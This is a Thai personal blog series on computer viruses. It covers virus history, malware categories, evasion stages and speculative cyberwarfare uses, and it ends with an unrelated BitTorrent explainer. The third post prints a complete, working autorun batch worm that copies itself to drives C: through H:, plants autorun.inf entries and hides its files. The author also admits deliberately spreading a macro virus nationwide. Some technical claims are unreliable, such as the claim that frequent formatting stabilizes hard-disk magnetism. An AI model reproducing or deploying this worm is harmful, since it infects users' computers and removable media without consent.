วันพฤหัสบดีที่ 21 มกราคม พ.ศ. 2553

PostHeaderIcon ปัญหาไวรัส...เรื่องราวที่ไม่เคยจบ...เคยสิ้น ภาค 4

คุณ...ๆ เคยรู้ไหมว่า...สงครามอิเล็กทริก มันมีจริง...และไม่ใช่แค่นิยายด้าน
วิทยาศาสตร์ แบบเรื่อง ID4 แต่ความจริงแล้ว...ไวรัสคอมพิวเตอร์นั้นสามารถนำ
มาทำเป็นยุทธโทปกรณ์ด้านอิเล็กทรอนิกส์ กันจริงๆ ...ถ้าอยากรู้ก็รอดูสงคราม
โลกครั้งที่ 3 (ไม่รู้มันจะเกิดจริงหรือเปล่า) ผมอาจจะไม่มีข้อมูลหรือหลักฐานที่
มากไปกว่า...การทดลองและคำพูดที่เลือนลอย...แต่คุณก็จินตนาการตามแล้ว
กันว่า...จะใช้ไวรัสคอมพิวเตอร์ทำอะไรบ้างในสนามรบ....
1. ช่วงชิงการทำลายฐานข้อมูลข้าศึก... "ก่อนที่จะทำการโจมตีข้าศึกในแนวรบ
นักการทหารจะต้องใช้กลยุทธทุกๆ อย่างในการทำลายส่วนควบคุมบัญชาการ
รบของแนวข้าศึกเพื่อลดทอนประสิทธิภาพในการรบออกไป...เช่น ปล่อยไวรัส
คอมพิวเตอร์ไปยังสัญญาณ ไวเลช...บูททูสน์...หรือ อินเตอร์เน็ต...ก่อนออก
แถลงการโจมตี และส่งเครื่องบินไร้คนขับ...ปล่อยสัญญาณความถี่ชนิดพิเศษ
(ไม่ทราบชื่อของมันแต่มีอยู่จริง) เพื่อเชื่อมโปรเซส ของ CPU PC คอมพิวเตอร์
ให้เป็น Asmbly Code ที่ต้องการ...และช่วงชิงการทำลายข้อมูล เข้ารหัส...และ
ฝั่ง Back Door เอาไว้เพื่อล้วงความลับของคอมพิวเตอร์ส่วนบุคคลแดนข้าศึก"
2. ทำลายการสื่อสาร...ดาวเทียม...และการบัญชาการ..."เมื่อประกาศการรุกราน
นักการทหารข้าศึกจะสั่งการตอบโต้...แต่ถ้าถูกตัดสัญญาณการบัญชาการรบ
หัวรบขีปนาวุธ...เครื่องบินรบ...กองเรือยุทธการ...รวมถึงกำลังภาคพื้นดิน...ไวรัส
จะมีหน้าที่ในการก่อกวนการสื่อสาร...บางครั้งแทรกซึม...แพร่กระจายตัวยังเครือ
ข่าย...ทั้งเครื่อง "เมนเฟรม", "ซุปเปอร์คอมพิวเตอร์" โดยให้มันทำงานเกินอัตตรา
หรือ เข้ารหัสสัญญาณเก็บข้อมูล...รวมทั้งปล่อยข่าวล่วงด้านการศึก...หากสำเร็จ
เพียง 1 เครื่อง ใน 10 เครื่องก็ถือว่า ชนะในสงครามด้าน อิเล็กทริก"
3. สืบค้นข้อมูลสำคัญ...และส่งข้อมูลที่จำเป็นกับสู่แนวรบ..."เมื่อทำศึกแล้ว สิ่งที่
สำคัญที่สุดในยุทธปัจจัย...คือ การข่าว...ไวรัสคอมพิวเตอร์จะส่งข้อมูลด้านสาร
สนเทศออกจากฐานข้าศึกในทุกรูปแบบ...ทุกชั่วโมงและวินาที...ไม่ว่าจะเป็นราย
ชื่อทหารเสนาธิการ...กองกำลังแนวหน้า...หรือแผนที่ทางการทหาร...อาวุทยุทโธ-
ปกรณ์ที่ใช้ทำส่งคราม...ไม่ว่าข้อมูลในส่วนใดก็ตามถ้าเล็ดลอดออกไปได้...จะ
เกิดผลเสียต่อข้าศึกอย่างมาก"
4. ควบคุม...ทำลาย...เทคโอเวอร์..."คำสั่งนี้...จะเป็นคำสั่งสุดท้ายของไวรัส...คือ
มือถูกจับตัว...หรือถูกค้นพบ...จะทำลายตัวเอง...เพื่อไม่ให้ถอดรหัสคำสั่งหรือ...
ถูกขวางการทำงานด้านอิเล็กทริก...จะส่งคำสั่งพิเศษทำลายอุปกรณ์ด้าน ฮาร์ด-
แวร์ (ทำได้ในภาพทฤษฎีและเคยทำสำเร็จในห้องทดลอง) เพื่อถ่วงเวลาการกู้
ข้อมูลและการสืบค้นไวรัส...รวมถึงทำลายฐานข้อมูลทุกรูปแบบ..ไม่ว่าจะเป็น
รายชื่อสำมะโนครัว...โปรแกรมพื้นฐานต่างๆ ...ข้อมูลเข้ารหัสต่างๆ...โดยไม่สน
ใจว่าสำคัญหรือไม่...ด้วยวิธีการพิเศษที่ไม่สามารถทำการกู้ข้อมูลได้ ไม่ว่าจะเป็น
การเขียนทับ...Empty Folder หรือ สร้างม้าโทรจัน...เชื่อมต่ออุปกรณ์ต่อเติม...
ลอจิกบอมส์แบบ รันไทม์ ถึงแม้คำสั่งเหล่านี้จะเป็นคำสั่งพื้นฐาน...แต่มันมีผลมาก
ต่อผู้ใช้เทคโนโลยีสารสนเทศ เหมือนกับ...สายระเบิดที่นักกู้ระเบิดรู้อยู่แล้วว่า
ต่อสลับวงจร...แต่ก็กดดันจิตวิทยา...และสร้างความสับสนให้ผู้กู้ข้อมูลพอสมควร"
5. ท้ายที่สุด...."มีไวรัส...เหมือนไม่มีไวรัส" หมายถึง..."ไม่ว่าสงครามจะออกมา
ในรูปแบบใด...ไวรัสคอมพิวเตอร์จะต้องฝั่งตัวอยู่ต่อไป...แม้ว่าถูกจับได้...หรือ
ประเทศรุกรานพ่ายแพ่...แต่ไวรัสคอมพิวเตอร์เหล่านั้นจะต้องฝั่งตัวอย่างเงียบ..ๆ
เสมือนว่าไม่เคยเกิดอะไรขึ้น...และรอค่อยการเรียกใช้งานอีกครั้ง...ผ่าน Back
Door ("ประตูหลัง...ทางสู่นรก")"

โอ...อ่านแล้วรู้สึก โอเวอร์...โหลด อย่างมาก...เห้อ...แต่ว่า...ในโลกแห่งความ
เป็นจริงนั้น...คุณๆ ยังไม่รู้หลอกครับว่า...เขียนไวรัสขึ้นมา 1 ตัว...ต้องใช้ประสบ
การณ์และจินตนาการขนาดไหน...ไม่ต้องสงสัย...หรือเชื่อในสิ่งที่ผมเล่ามาหลอก
ครับ...เพียงคุณลองจินตนาการดูซิว่า "มิจฉาชีพทุกคนเขียนไวรัสเป็นโลกจะวุ่น
วายขนาดไหน" และถ้าคำพูดแค่ "คัดลอกฉันไปยังทุกๆ เครื่องบนโลกใบนี้" มัน
สามารถทำได้จริง...จะเกิดอะไรขึ้น...ในโลกของคุณ....

PostHeaderIcon ปัญหาไวรัส...เรื่องราวที่ไม่เคยจบ...เคยสิ้น...ภาค 3

วันนี้...ผมได้ทำการทดลองโค้ด...Godzilla เพื่อดูการทำงานของมันอย่างละเอียด
ทั้งๆ ที่มันเป็น สคริป .VBS ธรรมดาๆ แต่มันก็มีความสามารถทำให้ผู้ใช้คอมฯ รุ่นๆ
มือใหม่...ไม่สามารถฆ่ามันได้...รวมถึงทำให้ผู้ดูแลระบบปวดหัวกับอุปกรณ์ USB
ว่าแต่...คุณละเคยเห็นน่าตาพวกมันหรือเปล่า...เอาล่ะ...มีตัวอย่าง...ของไวรัส
จำพวก แฟลชไดร์ฟ ให้ดู...*** สำคัญมากๆ ถ้าคุณยังไม่เซียน...เกี่ยวกับการ
ฆ่าไวรัส...แนะนำ...ดูเฉยๆ ไม่ต้องก็อปไป...(เพราะโปรแกรมฆ่าไวรัสรุ่นใหม่ๆ...
ยังฆ่ามันไม่ได้...เพราะผมเขียนเอง...ไม่ได้มีไว้แพร่แต่มีไว้ศึกษา)
@echo off
:: ติดเชื้อ C:
if not exist c:\autorun.inf echo [autorun] > c:\autorun.inf
if exist c:\autorun.inf copy 666.bat c: > nul
if exist c:\666.bat echo shellexecute=666.bat >>c:\autorun.inf
if exist c:\autorun.inf attrib +s +h +r c:\autorun.inf > nul
if exist c:\666.bat attrib +s +h +r c:\666.bat > nul
:: ติดเชื้อ D:
if not exist d:\autorun.inf echo [autorun] > d:\autorun.inf
if exist d:\autorun.inf copy 666.bat d: > nul
if exist d:\666.bat echo shellexecute=666.bat >>d:\autorun.inf
if exist d:\autorun.inf attrib +s +h +r d:\autorun.inf > nul
if exist d:\666.bat attrib +s +h +r d:\666.bat > nul
:: ติดเชื้อ E:
if not exist e:\autorun.inf echo [autorun] > e:\autorun.inf
if exist e:\autorun.inf copy 666.bat e: > nul
if exist e:\666.bat echo shellexecute=666.bat >>e:\autorun.inf
if exist e:\autorun.inf attrib +s +h +r e:\autorun.inf > nul
if exist e:\666.bat attrib +s +h +r e:\666.bat > nul
:: ติดเชื้อ F:
if not exist f:\autorun.inf echo [autorun] > f:\autorun.inf
if exist f:\autorun.inf copy 666.bat f: > nul
if exist f:\666.bat echo shellexecute=666.bat >>f:\autorun.inf
if exist f:\autorun.inf attrib +s +h +r f:\autorun.inf > nul
if exist f:\666.bat attrib +s +h +r f:\666.bat > nul
:: ติดเชื้อ G:
if not exist g:\autorun.inf echo [autorun] > g:\autorun.inf
if exist g:\autorun.inf copy 666.bat g: > nul
if exist g:\666.bat echo shellexecute=666.bat >>g:\autorun.inf
if exist g:\autorun.inf attrib +s +h +r g:\autorun.inf > nul
if exist g:\666.bat attrib +s +h +r g:\666.bat > nul
:: ติดเชื้อ H:
if not exist h:\autorun.inf echo [autorun] > h:\autorun.inf
if exist h:\autorun.inf copy 666.bat h: > nul
if exist h:\666.bat echo shellexecute=666.bat >>h:\autorun.inf
if exist h:\autorun.inf attrib +s +h +r h:\autorun.inf > nul
if exist h:\666.bat attrib +s +h +r h:\666.bat > nul
:: เข้าหน้าต่างปกติ
start .

เพียงแค่คำสั่งง่ายๆ...ไม่กี่นาทีก็สร้างมันเสร็จ...กลายเป็นไวรัสที่มีอันตรายต่อ
ผู้ใช้คอมพิวเตอร์ที่ไม่รู้วิธีป้องกัน...ผมยังค้างเรื่อง...."เขียนไวรัสได้ตังค์หรือเปล่า"
คำตอบมันอยู่ในตัวของมันครับ..."ไม่ได้สตังค์สักบาท" แต่ "ชื่อเสีย...เราได้มา"
เผลอ...กรมตำรวจจะเอาผิดกับโค้ดไวรัสที่ผมเสนออีกต่างหาก....อือ...และทำไม
พวกนักศึกษาบางคนชอบเขียนไวรัสมาแกล้งคนอื่น... คำตอบมันอยู่ที่ความท้า-
ทายของการทดลองโค้ดภาษาต่างๆ ให้มันมีชีวิต...และเราศึกษาการฆ่าไวรัสเหล่า
นั้น...เพื่อมีประสบการณ์ด้าน Sucurity กับตัวเอง...และองค์กร...ผมเองยอมรับ
ครับว่า..."เมื่อ...10 ปีที่แล้ว...โค้ด มาโคร..."ไวรัส" "โดยกูเอง" แพร่ไปทั่วประ-
เทศไทย...ครั้งนั้นเกิดจากความตั้งใจ...แพร่เชื้อ...เพื่อทดสอบการแพร่ระบาด
ของไวรัสมาโครเอกสาร...จากขอนแก่น...ไปยังกรุงเทพมหานคร...โดยคาดคะเน
ว่ามันน่าจะไปได้...ถ้าเอกสารเหล่านั้นแพร่ต่อๆ กันไปเรื่อย...ผมสรุปของมันคือ
ผมไปทำงานที่กรุงเทพ...ก็เจอเจ้าไวรัสเพื่อนเก่าของผม...แพร่ระบาดไปเหมือน
กับที่ทำนายเอาไว้....โดยหลังจากนั้นผมก็เสนอวิธีฆ่าไวรัสมาโครไว้ใน เวปไซต์
เพื่อให้รู้จักป้องกัน...ทุกวันนี้...ไวรัสพวกนั้นไม่สามารถเข้าสู่ระบบเอกสารได้...
ไม่ว่าจะเขียนโค้ด "โพลีมอฟิก" ยังไงก็ตาม...
ที่พูดมาทั้งหมด...ไม่ใช่จะบอกว่าตัวเองเก่งมากมาย...หรือน่ายกย่อง...แต่อยาก
ให้คุณทุกคนเข้าใจครับว่า...ถ้าคุณยังมัวแต่ใช้เครื่องคอมเพียง...เปิดคลิป...
เล่นเกมส์...และฟังเพลง...มันเป็นความบันเทิงครับ...แต่ถ้าคอมเสียขึ้นมามันก็
ไม่บันเทิงครับ...300 บาท อย่างต่ำๆ ที่ต้องเสียให้กับการฆ่าไวรัส....ทั้งๆ ที่ช่าง
คอมเหล่านั้น...ก็รู้งูๆ ปลาๆ เกี่ยวกับ "ไวรัส" เขาเหล่านั้นรอให้โปรแกรมฆ่าไวรัส
ที่เขาใช้งานหาไวรัสตัวนั้นเจอ...และฆ่ามันทิ้ง...กว่ามันจะออกรุ่นใหม่มาให้คุณ
ใช้งานและฆ่ามันได้...คุณต้องรอกี่เดือนครับ...ถามจริง...ฉนั้น...ไม่มีใครเก่งกว่า
ใครครับ...ในโลกไซเบอร์...ลองฆ่ามันดู...ศึกษามันบ้าง...มันไม่ยากเกินกว่า
คนโง่บ้าๆ อย่างผมหลอกครับ...อย่ามัวแต่ให้ช่างเขาหลอกคุณอยู่ร่ำไป...ถ้ายัง
ลงวินโดวส์ไม่เป็น...ถามได้ครับ...ยังโกสต์ไม่เป็น...ก็ถามได้ครับ...ยังแบ่งพา-
ทิชั่นไม่เป็นก็ถามมาครับ...หรือยากจะใช้ ลีนุกซ์อย่างผม...ก็ถามมาครับ...
เครื่องคอมนะครับ...ผมขอบอก...ตั้งมันไว้เฉยๆ มันก็เสียครับ...ถ่าน CMOS หมด
ฉนั้น...มาลองหัดแกะ...แงะ...โปรแกรมมันก่อนครับ...อย่าเพิ่งยุ่งเกี่ยวกับ อุปกรณ์
ถ้าเป็น โปรแกรม เราฟอร์แมทยิ่งมาก ยิ่งดีครับ (ไม่ใช่อย่างที่หลายๆ คนคิด)
เพราะจะทำให้ อนุภาคแม่เหล็กภายใน "ฮาร์ดดิสก์" มีประจุคงที่...สม่ำเสมอ...
หัดลงวินโดวส์เอง...จากนั้นสำรองข้อมูลโดย Nortun Ghost ที่นี้...ต่อให้ไวรัส
อะไรก็ตามมันเล่นงานคุณได้แค่ผิวเผินครับ...

เรื่องยุทธการทางการทหารของไวรัสคอมพิวเตอร์ไว้ต่อตอนหน้าครับ...

PostHeaderIcon ปัญหาไวรัส...เรื่องราวที่ไม่คยจบ...เคยสิ้น...ภาค 2

เกริ่นให้พอทราบกันแล้ว...ใน Blog ที่แล้ว...

คุณเคยคิดไหมว่า...ทำไมเขาต้องเขียนไวรัสกันขึ้นมา...หรือเพื่อสนุก(ใช่เลย)
หรือเพื่อการทดลอง...(ก็ใช่อีก) ...หรือเพื่อการค้า(ปัจจุบันนี้มันก็เป็นอย่างนั้น)
และทำไม...เราทุกคนต้องทนอยู่กับปัญหาพวกนี้...ทั้งที่เราไม่ได้เป็นก่อมันขึ้น
มา...(ทุกคนก่อมันขึ้นอย่างไม่รู้ตัว)
ปัญหาที่ทำให้ไวรัสในปัจจุบันแพร่หลายอย่างรวดเร็วคือ
1. ผู้ใช้เครื่องคอมพิวเตอร์...ไม่เข้าใจหลักการทำงานของพวกมัน
2. ผู้ใช้เครื่องคอมพิวเตอร์...ไม่ซื้อโปรแกรมที่มีลิขสิทธิ์มาใช้
3. ผู้ใช้เครื่องคอมพิวเตอร์...ละหลวมต่อการดูแลข้อมูลของตนที่ส่งให้ผู้อื่น
4. ผู้ใช้เครื่องคอมพิวเตอร์...ส่วนใหญ่นึกว่าโปรแกรมฆ่าไวรัสจะฆ่ามันได้ทุกตัว
5. ถึงแม้จะทำได้หมดทั้ง 4 ข้อ...แต่เราก็ถูกโจมตีจากไวรัส...เพราะเราทุกคน
คิดว่าถ้าติดไวรัส...เราก็จะฆ่ามันได้...หรือฟอร์แมท...และลงโปรแกรมใหม่จบ!
(แต่จบไม่จริง)
ทำไมนะ...หลักการที่อ้างมา...มันช่างทำยาก...หรือไม่อยากจะทำมันซะเลย...
อาจเป็นเพราะเราๆ ทุกคนคิดว่า ไวรัส...มันไม่น่าจะมีอันตรายต่อพวกเรามาก
ไปกว่า...การก่อกวน...รีสตาร์ท...หรือ โชว์ภาพผี...มันก็ถูกต้องครับ...ไวรัสส่วน
ใหญ่...ทำลายได้แค่..."ซอฟต์แวร์(สิ่งที่เป็นข้อมูลโปรแกรมและคำสั่งเท่านั้น)"
แต่ตัว "ฮาร์ดแวร์" ไวรัสนั้นส่วนน้อยครับ...ที่จะสามารถทำลายมันลงได้...ใน
อดีตที่ผ่านมา "CIH ; เหชิง อิง หัว" เป็นไวรัสที่สามารถทำลาย "ฮาร์ดแวร์" ได้
ด้วยการทำลาย "Flash RAM BIOS" เป็นผลทำให้เมนบอร์ดคอมพิวเตอร์ของ
เราพังในทันที นักเขียนไวรัสชาวไตหวันคนนี้...ทุกวันนี้ยังคงโพสต์กระทู้ตอบ
เรื่องไวรัสและประดิษฐ์กรรมทางไวรัส CIH รุ่นใหม่ๆ ออกมาเสมอๆ เพราะ
กฎหมายบ้านเขา...ไม่มีการระบุโทษเอาไว้...ในเมืองไทยเรา...การเขียนไวรัส
ในปี 2007 นี้...ถือเป็นสิ่งผิดกฎหมายครับ...เพราะกฎหมายพึ่งมีผลบังคับใช้ปีนี้
และก็ยังไม่มีการ "เชือดไก่ให้ลิงดู..." ซะด้วย
ไวรัส...ไวรัส...ไวรัส...เอ๊ะ...มันทำงานอย่างไร...?
1. ถ้าเริ่มบูตเครื่อง...ไวรัสสามารถครอบครองหน่วยความจำ...Viture Memory
ได้...ก่อนโปรแกรมฆ่าไวรัส...ไวรัสจะชนะทันที (บูตเซกเตอร์ และ พาทิชั่นไวรัส)
2. ถ้ายังไม่ได้...จะเริ่มแทรกซึมเช้าสู้แฟ้มระบบของวินโดวส์...เพื่อย้ายการค้นหา
ไวรัสไปยังแฟ้มที่ไวรัสหลอกเอาไว้...ถ้าทำได้...ไวรัสก็จะชนะอีก (ไวรัสฝั่งตัว
ในหน่วยความจำ หรือ สเตร์ทไวรัส "ไอ้เครื่องบินรบ")
3. ถ้ายังไม่ได้...จะฝั่งตัวเข้าระบบฐานข้อมูลวินโดวส์เช่นแฟ้ม service .ini, .inf,
และ Registry เพื่อไม่ให้ โปรแกรมฆ่าไวรัสมาฆ่ามันได้...ถึงแม้ตรวจเจอก็ตาม
(ไวรัสสคริปวินโดวส์...หรือซิสเต็มไวรัส)
4. ถ้ายังไม่สำเร็จ..."รีโทล ไวรัส" จะทำการลบโปรแกรมฆ่าไวรัสทิ้งซะ...ตอนนี้
ต้องแข่งขันกันเชิงกลยุทธ์ ระหว่าง "เทพกับมาร" ใครแพ้ต้องตาย...!
5. ถ้ายังไม่สำเร็จ...จะเปลี่ยนหน้าตาตัวเอง...ไม่ให้ซ่ำกัน..."โพลีมอฟิก ไวรัส"
จะแพร่ตัวเองอย่างรวดเร็วโดยเป็น "จอมโจรพันหน้า" ถึง...ตำรวจอย่างโปรแกรม
ฆ่าไวรัสจะเจอ...ก็ฆ่าได้บางตัวที่จำหน้ามันได้...แต่ฆ่าไม่ได้ทุกตัวเพราะ...มัน
เปลี่ยนหน้าตาไปทุกครั้งที่แพร่เชื้อ
6. ถ้ายังไม่สำเร็จ...ก็จะติดต่อ...สื่อสาร...กับจอมมารในเน็ตเวิร์ค(ผู้เขียนไวรัส)...
เพื่อดาวน์โหลดโปรแกรมไวรัสรุ่นใหม่ๆ ลงมา...ต่อสู้กับโปรแกรมฆ่าไวรัส
(อินเตอร์เน็ตไวรัส...หรือ มัลแวร์แบ็กดอร์ "พวกชอบประตูหลัง")
7. ถ้ายังสู่โปรแกรมฆ่าไวรัสไม่ได้อีก...ไม่รู้จะเขียนอะไรดี...ปล่อยจดหมายลูกโซ่
แกล้งคนอื่นๆ ดีก่า...ว่ามันเป็นไวรัส...ถ้าไม่ส่งต่อ...ติดเชื้อถึงตาย..."โฮแอกซ์
หรือ ไวรัสตลก..."
8. โอยยังมี "มัลติแพล็ตฟอร์มไวรัส...มัลติโอเอสไวรัส...รันไทม์ไวรัสอีก...ที่ยัง
ไม่กล่าวถึง..."ผมถามจริงๆ เหอะ...เขียนขึ้นมาเคยได้สตังค์กันบ้างใหม?"

เอาไว้ภาค 3 เรามาคุยกันว่า..."เขียนไวรัสมันได้ตังค์ยังไง...และยุทธศาสตร์ทาง
การทหารใช่ไวรัสทำอะไร"

PostHeaderIcon ปัญหาไวรัส...เรื่องราวที่ไม่เคยจบ...เคยสิ้น

สาหวัดดีครับ...ห่างหายไปนาน...อุๆๆๆ


เอาล่ะ...มาเข้าเรื่องไวรัส...ไวร้ายดีกว่า...ทุกวันนี้หลายคนรู้...และเข้าใจกันดีว่า
"ไวรัสคอมพิวเตอร์" ไม่ใช่ฝุ่นละอองที่ปนเปื้อนด้วยเชื้อไข้หวัดในคน...แต่มันคือ
"โปรแกรมจำลองตัวเอง" แบบพิเศษที่สามารถติดเชื้อไปยัง "พาหะ" ที่เป็นสื่อ
เก็บข้อมูล...และผ่านทางเน็ตเวิร์ค..."ไวรัสไม่ใช่วิญญาณชั่วร้ายในคอมฯ" แต่
"มันถูกสร้างจากผู้มีวิญญาณชั่วร้ายในไซเบอร์แห่งนี้" ยังไงก็ตาม...เราทุกคน
ต้องทนอยู่กับเจ้าสิ่งแปลกปลอมนี้ไปอีกนาน...

กำเนิดของไวรัสพอสังเขป...เริ่มจาก "จอน วอน นิวแมน" ตั้งทฤษฏีว่า "โปรแกรม
คอมพิวเตอร์สามารถจำลองตัวมันเองได้" ในหนังสือที่เขาประพันธ์ (ตอนนั้นยัง
ไม่มีคอมพิวเตอร์ PC ที่เราใช้กันอยู่ด้วยซ้ำ) และเขาก็คิดถูก...เพราะหลังจากนั้น
ไม่นาน ศูนย์วิจัย "เบลแลป" ทำการทดสอบโปรแกรมที่มีชื่อว่า "สงครามหน่วย
ความจำ" โดยให้โปรแกรมเมอร์ในทีมวิจัย...สร้าง "โปรแกรมที่สามารถจำลอง
ตัวเองเพื่อแย่งชิงหน่วยความจำในเครื่อง เมนเฟรม" ผลปรากฎคือ...เกิดโปรแกรม
จำพวกไวรัส...ตัวแรกบนโลก...ในห้องทดลอง...โดยที่ กระทรวงกลาโหมของ
สหรัฐอเมริกา...ได้รับรายงานแต่ก็คิดว่ามันไม่มีอันตรายใดๆ ต่อเครื่องของพวก
เขา...หลังจากนั้นไม่นาน...ก็มีไวรัสแพร่ระบาดในเครือข่าย่ของสหรัฐอเมริกา...
จนเป็นสาเหตุ...ให้ทุกฝ่ายหันมาให้ความสนใจเรื่องไวรัสคอมพิวเตอร์...ต่อมา
"เฟรด โคเฮน" ก็เป็นคนแรก...ที่ตั้งคำจำกัดความให้กับโปรแกรมจำพวกนี้ว่า
"ไวรัสคอมพิวเตอร์" พร้อมกับ ทำไวรัสออกมาเพื่อสาธิตให้กับ คนทั่วๆ ไปได้
ทราบว่ามันคืออะไร เขาถึงได้สมญาว่าเป็น "บิดาแห่งไวรัสคอมพิวเตอร์" ไวรัส
ยังคงมีอย่างต่อเนื่อง...ในยุคที่ PC ถือกำเนิด ก็มีไวรัสตัวแรกที่ติดเชื้อบนเครื่อง
PC คือ "ซี เบรน" ซึ่งเขียนโดยสองพี่น้องชาวปากีสทาน (ขอไม่เอ่ยนาม...เพราะ
ไม่ใช่วีรบุรุษ) ซึ่งเขียนไวรัสบูตเซกเตอร์ ติดเชื้อไปกับแผ่น "บูตดอส" ของ
ดอส 3.1 รุ่นโบราน...(แต่ทุกวันนี้มันยังทำงานได้บน Vista) ใครก็ตามนำแผ่น
โปรแกรมละเมิดลิขสิทธิ์ที่สองพี่น้องผู้นี้ขายให้...ติดไวรัสกับบ้านไปทุกคน...
ต่อมาเกิดไวรัสติดแฟ้ม .COM, .EXE ที่ชื่อ "เจรูซาเลม" ถือเป็นไวรัสติดแฟ้ม
ข้อมูลจำพวกแรกที่กำเนิดขึ้นบนโลก...คนเขียนเหรอ...ไม่มีใครทราบตัวตนที่
แท้จริง...รู้อย่างเดียวว่ามันระบาดในโรงเรียนแห่งหนึ่งใน "เยรูซาเลม" เป็นที่แรก
(พอกันกับไวรัส "ลาวดวงเดือน" ซึ่งเป็นไวรัสบูตเซกเตอร์และเป็นไวรัสตัวแรก
ของประเทศไทย...ทุกวันนี้ก็ยังไม่มีใครทราบว่าคนเขียนเป็นใคร...ผมอยากเจอ
ตัวเหมือนกัน...จะถามเขาว่า...เขียนขึ้นมาแล้วสนุกยังไง)
ไวรัสคอมพิวเตอร์ยังคงระบาดต่อไปเรื่อยๆ จนถึงยุคปัจจุบัน...แต่เดียวนี้ทาง
องค์การ CERT ได้นิยามคำศัพย์ให้โปรแกรมจำพวกนี้ใหม่ โดยเรียกว่า "มัลแวร์"
มัลแวร์...อะไรคือ ...มัลแวร์
1. ไวรัสคอมพิวเตอร์ "โปรแกรมจำลองตัวเองไปยังแฟ้มต่างๆ ได้ (จำกัดความจากแฟ้มคอมพิวเตอร์)"
2. หนอนคอมพิวเตอร์ "โปรแกรมจำลองตัวเองไปยังเครื่อข่ายและเครื่องต่อเครื่อง (จำกัดความจาก พาหะติดเชื่อ)"
3. ม้าโทรจัน "โปรแกรมทำลายเมื่อเปิดหรือเสียบอุปกรณ์สื่อสาร"
4. แอดแวร์ "โปรแกรมเพิ่มหน้าเวปหรือ โฆษณาที่ไม่ต้องการในเครื่องคอมฯ"
5. สปายแวร์ "โปรแกรมดักจับรหัส...ดักจับข้อมูล...หรือฝั่งตัวเองเพื่อสืบความลับ"
6. โฮแอกซ์ "โปรแกรมปลอมๆ สนุกๆ ล้อกันเล่นว่าคือไวรัส...เป็นจดหมายลูกโซ่"

แค่นี้ก่อนนะ...ครับ...เวลามีน้อย...เดียวจะมาเพิ่มเติมอีก
วันพุธที่ 16 ธันวาคม พ.ศ. 2552

PostHeaderIcon BitTorrent (BT) คืออะไร?

Bittorrent เป็นมาตรฐาน P2P (peer to peer) ที่ใช้เพื่อรับส่งไฟล์ระหว่างผู้ใช้ Internet ด้วยกัน เครื่องผู้ใช้จะติดต่อกับเครื่องของผู้ใช้อื่นเพื่อรับส่งชิ้นส่วนของไฟล์ จะมีเครื่องมือหนึ่ง หรือ โปรแกรม (เรียกว่า Tracker) ทำหน้าที่เป็นตัวจัดระบบการสื่อสารระหว่างผู้ใช้เหล่านั้น(peers) ตัว Tracker จะทำหน้าที่จัดการเท่านั้น จะไม่มีข้อมูลของไฟล์ที่รับส่ง

ดังนั้น Tracker จึงไม่ต้องมีเน็ตที่แรงเพราะไม่ได้รับส่งไฟล์เอง สิ่งที่ทำให้ BT อยู่ได้ก็คือหลักการที่ผู้ใช้ควรจะส่งไฟล์ขณะเดียวกับที่รับไฟล์ หากมีผู้ใช้มากก็จะเร็วมาก การทำงานของ BT ก็คือการหั่นไฟล์นึงเป็นหลายๆ ส่วน แล้วส่งคนละส่วนไปยังผู้รับหลายคน พอผู้รับเหล่านั้นได้รับส่วนเหล่านั้นก็จะสามารถรับส่งกันเองเพราะต่างกันต่างมีชิ้นส่วนที่คนอื่นไม่มี ทำให้ไม่ต้องพึ่งผู้ส่งผู้เดียว
BT เป็นการรวมคนปล่อย และคนดูด ไฟล์ใดไฟล์หนึ่ง เข้ามารวมไว้ด้วยกัน
จะมีการติดต่อตามจำนวนคนที่แชร์ไฟล์นั้นอยู่ คือ 1 ไฟล์ จะมีหลาย Connection ทำให้มีความเร็วสูง
แบบเดิมจะรับไฟล์ได้จากคนปล่อยเพียงคนเดียว ส่วน BT ก็จะรับไฟล์จากคนปล่อยได้หลายคน
ลักษณะการส่งจะเป็นแบบส่งต่อ คือคนที่ได้รับไฟล์แล้วก็จะส่งไฟล์ต่อไปให้คนที่ยังไม่ได้อีกที
คือแทนที่จะเป็นคนรับอย่างเดียว ก็จะเป็นทั้งรับ และปล่อย ไปพร้อมๆกัน เวลารุมดูดไฟล์พร้อมกันจึงไม่ช้า
เหมาะกับการแชร์ไฟล์ขนาดใหญ่ ตั้งแต่ 10M ขึ้นไปจนถึง 10G หรือมากกว่านี้
Bittorrent แบ่งเป็นส่วนสำคัญอยู่ 3 ส่วนคือ

1. Tracker Client คือ Application ที่ใช้ในการ Download/Upload File Bittorrent ซึ่งมีหลายโปรแกรม แต่ล่ะโปรแกรมก็มีความแตกต่างกัน เพียงแค่ interface เพราะโปรแกรมเหล่านี้ทำหน้าที่download/upload file torrent นั้นเอง

2.Tracker Server คือแม่ข่ายทำหน้าที่เป็นตัวกลางระหว่างระหว่าง Client และทำหน้าที่เก็บรวบรวม Torrent File ไว้

3.Torrent File คือตัวสำคัญในการรับ-ส่ง Share File กัน เพราะ Torrent File นี้จะถูก Generate File ขึ้น โดยจะต้องมีการกำหนด URL ของ Tracker Server ที่ผู้ส่งจะต้องไปเป็นคนระบุไว้
และ รูปแบบประเภทของ File นั้นๆ
การทำงานของ Bittorrent จะต้องมีทั้ง 3 ข้อนี้ ถ้าขาดส่วนใดส่วนหนึ่ง โครงข่ายนี้จะไม่สมบูรณ์ทันที และถ้าโครงข่ายของ Bittorrent นี้ถ้ามีผู้เข้ามาร่วมโครงข่ายนี้เยอะเท่าไหร่ การ Tranfer File ก็มีสูงยิ่งขึ้น
ดังนั้น Torrent ไฟล์ที่เก็บค่าข้อมูลตัวไฟล์จริงๆ ในความหมายนั้นคือ ไฟล์ขนาด 100MB พอสร้างเป็นไฟล์ *.torrent จะเหลือเพียงไม่กี่สิบ kb เท่านั้น ฉะนั้นแล้ว *.torrent มีหน้าที่แค่เพียงเก็บข้อมูลต่างๆเท่านั้นเอง เช่น เก็บรายชื่อไฟล์ตัวจริง, เก็บข้อมูลชิ้นส่วนขนาดไฟล์, ชื่อผู้สร้างไฟล์ทอเร้นท์ขึ้นมา

Tracker คืออะไร?
